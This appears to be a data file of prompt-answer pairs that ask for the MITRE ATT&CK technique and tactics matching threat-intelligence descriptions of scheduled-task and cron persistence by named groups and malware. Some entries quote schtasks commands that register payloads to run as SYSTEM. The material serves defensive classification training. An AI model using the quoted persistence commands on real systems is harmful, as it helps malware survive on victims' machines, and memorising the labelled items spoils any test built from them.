+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca used the command schtasks /Create /SC ONLOgon /TN WindowsUpdateCheck /TR “[file path]” /ru system for persistence.,"Tecnique: T1053 Scheduled Task/Job, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEADEYE has used the scheduled tasks `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility`, `\Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`
+ to establish persistence.","Tecnique: T1053 Scheduled Task/Job, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot's second stage DLL has set a timer using “timeSetEvent” to schedule its next execution.,"Tecnique: T1053 Scheduled Task/Job, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec schedules the execution one of its modules by creating a new scheduler task.,"Tecnique: T1053 Scheduled Task/Job, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrifeWater has create a scheduled task named `Mozilla\Firefox Default Browser Agent 409046Z0FF4A39CB` for persistence.,"Tecnique: T1053 Scheduled Task/Job, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT18 actors used the native at Windows task scheduler tool to use scheduled tasks for execution on a victim network.,"Tecnique: T1053.002 Scheduled Task/Job: At, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used at to register a scheduled task to execute malware during lateral movement.,"Tecnique: T1053.002 Scheduled Task/Job: At, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 actors use at to schedule tasks to run self-extracting RAR archives, which install HTTPBrowser or PlugX on other victims on a network.","Tecnique: T1053.002 Scheduled Task/Job: At, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can set a scheduled task on the target system to execute commands remotely using at.,"Tecnique: T1053.002 Scheduled Task/Job: At, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MURKYTOP has the capability to schedule remote AT jobs.,"Tecnique: T1053.002 Scheduled Task/Job: At, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: at can be used to schedule a task on a system to be executed at a specific date or time.,"Tecnique: T1053.002 Scheduled Task/Job: At, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used cron to create pre-scheduled and periodic background jobs on a Linux system.,"Tecnique: T1053.003 Scheduled Task/Job: Cron, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has made modifications to the crontab file including in `/var/cron/tabs/`.,"Tecnique: T1053.003 Scheduled Task/Job: Cron, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke installed a cron job that downloaded and executed files from the C2.,"Tecnique: T1053.003 Scheduled Task/Job: Cron, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor can install itself as a cron job.,"Tecnique: T1053.003 Scheduled Task/Job: Cron, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Linux uses crontab for persistence if it does not have root privileges.,"Tecnique: T1053.003 Scheduled Task/Job: Cron, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The GoldMax Linux variant has used a crontab entry with a @reboot line to gain persistence.,"Tecnique: T1053.003 Scheduled Task/Job: Cron, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Janicab used a cron job for persistence on Mac devices.,"Tecnique: T1053.003 Scheduled Task/Job: Cron, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing has used crontab to download and run shell scripts every minute to ensure persistence.,"Tecnique: T1053.003 Scheduled Task/Job: Cron, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can use crontabs to establish persistence.,"Tecnique: T1053.003 Scheduled Task/Job: Cron, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NKAbuse uses a Cron job to establish persistence when infecting Linux hosts.,"Tecnique: T1053.003 Scheduled Task/Job: Cron, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin can use Cron to create periodic and pre-scheduled background jobs.,"Tecnique: T1053.003 Scheduled Task/Job: Cron, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap has installed itself via crontab.,"Tecnique: T1053.003 Scheduled Task/Job: Cron, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpeakUp uses cron tasks to ensure persistence.,"Tecnique: T1053.003 Scheduled Task/Job: Cron, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash can create a cronjob for persistence if it determines it is on a Linux system.,"Tecnique: T1053.003 Scheduled Task/Job: Cron, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility`, `\Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles used scheduled task XML triggers.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During CostaRicto, the threat actors used scheduled tasks to download backdoor tools.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors established persistence through a scheduled task using the command: `/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR`, named ""WinUpdate""","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used scheduled tasks to execute batch scripts for lateral movement with the following command: `SCHTASKS /Create /S /U /p /SC ONCE /TN test /TR /ST /RU SYSTEM.`","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group created scheduled tasks to set a periodic execution of a remote XSL script.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used scheduled tasks to execute malicious PowerShell code on remote systems.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used `scheduler` and `schtasks` to create new tasks on remote host as part of their lateral movement. They manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration. APT29 also created a scheduled task to maintain SUNSPOT persistence when the host booted.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: In the Triton Safety Instrumented System Attack, TEMP.Veles installed scheduled tasks defined in XML files.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT-C-36 has used a macro function to set scheduled tasks, disguised as those used by Google.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used named and hijacked scheduled tasks to establish persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT3 downloader creates persistence by creating the following scheduled task: schtasks /create /tn ""mysc"" /tr C:\Users\Public\test.exe /sc ONLOGON /ru ""System"".","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used scheduled tasks to persist on victim systems.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has created a scheduled task to execute a .vbe file multiple times a day.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has created scheduled tasks to run malicious scripts on a compromised host.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used Task Scheduler to run programs at system startup or on a scheduled basis for persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has created scheduled tasks for persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used a compromised account to create a scheduled task on a system.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has used scheduled tasks for persistence and execution.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used schtasks to register a scheduled task to execute malware during lateral movement.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has used Windows Scheduled Tasks to establish persistence on local and remote hosts.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used scheduled tasks to invoke Cobalt Strike including through batch script schtasks /create /ru ""SYSTEM"" /tn ""update"" /tr ""cmd /c c:\windows\temp\update.bat"" /sc once /f /st and to maintain persistence.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has created Windows tasks to establish persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has created scheduled tasks to maintain persistence on a compromised host.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN10 has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has created scheduled tasks in the `C:\Windows` directory of the compromised network.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 malware has created scheduled tasks to establish persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used scheduled tasks to maintain RDP backdoors.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used Scheduled Tasks for persistence and to load and execute a reverse proxy binary.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM established persistence for PoisonIvy by created a scheduled task.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has created scheduled tasks to launch executables after a designated number of minutes have passed.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used a scheduled task to establish persistence for a keylogger.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa dropped and added officeupdate.exe to scheduled tasks.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has downloaded additional malware with scheduled tasks.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used schtasks for persistence including through the periodic execution of a remote XSL script or a dropped VBS payload.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has created scheduled tasks to establish persistence for their tools.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has created scheduled tasks to maintain Machete's persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used scheduled tasks to establish persistence and execution.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats has created scheduled tasks to persistently run VBScripts.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used scheduled tasks to establish persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has created a scheduled task to execute additional malicious software, as well as maintain persistence.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naikon has used schtasks.exe for lateral movement in compromised networks.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has created scheduled tasks that run a VBScript to execute a payload on victim machines.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Patchwork file stealer can run a TaskScheduler DLL to add persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rancor launched a scheduled task to gain persistence using the schtasks /create /sc command.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used scheduled tasks to stage its operation.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stealth Falcon malware creates a scheduled task entitled “IE Web Cache” to execute a malicious file hourly.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used scheduled tasks to establish persistence for installed tools.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has used scheduled tasks to execute discovery commands and scripts for collection.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used scheduled tasks to establish persistence for TrickBot and other malware.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used a script (atexec.py) to execute a command on a target machine via Task Scheduler.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has achieved persistence via scheduled tasks.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor can create a scheduled task for persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has created a scheduled SYSTEM task that runs when a user logs in.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AsyncRAT can create a scheduled task to maintain persistence on system start-up.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor's installer plugin can schedule a new task that loads the dispatcher on boot/logon.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can use `schtasks.exe` to gain persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS creates a scheduled task to establish by executing a malicious payload every subsequent minute.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BONDUPDATER persists using a scheduled task that executes every minute.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BabyShark has used scheduled tasks to maintain persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig has the ability to use scheduled tasks to repeatedly execute malicious payloads on a compromised host.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bad Rabbit’s infpub.dat file creates a scheduled task to launch a malicious executable.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can create a scheduled task for persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can achieve persistence by copying its DLL to a subdirectory of %APPDATA% and creating a Visual Basic Script that will load the DLL via a scheduled task.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CSPY Downloader can use the schtasks utility to bypass UAC.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon creates several tasks for later execution to continue persistence on the victim’s machine.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has used a scheduled task to launch its PowerShell loader.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke uses scheduled tasks typically named ""Watchmon Service"" for persistence.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: One persistence mechanism used by CozyCar is to register itself as a scheduled task.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crutch has the ability to persist using scheduled tasks.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DanBot can use a scheduled task for installation.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman has created a scheduled task for persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Disco can create a scheduled task to run every minute for persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dridex can maintain persistence via the creation of scheduled tasks within system directories such as `windows\system32\`, `windows\syswow64,` `winnt\system32`, and `winnt\syswow64`.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre has the ability to achieve persistence by adding a new task in the task scheduler to run every minute.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has maintained persistence through a scheduled task.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire has modules to interact with the Windows task scheduler.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilBunny has executed commands via scheduled tasks.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GRIFFON has used sctasks for persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer can establish persistence by creating a scheduled task.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax has used scheduled tasks to maintain persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
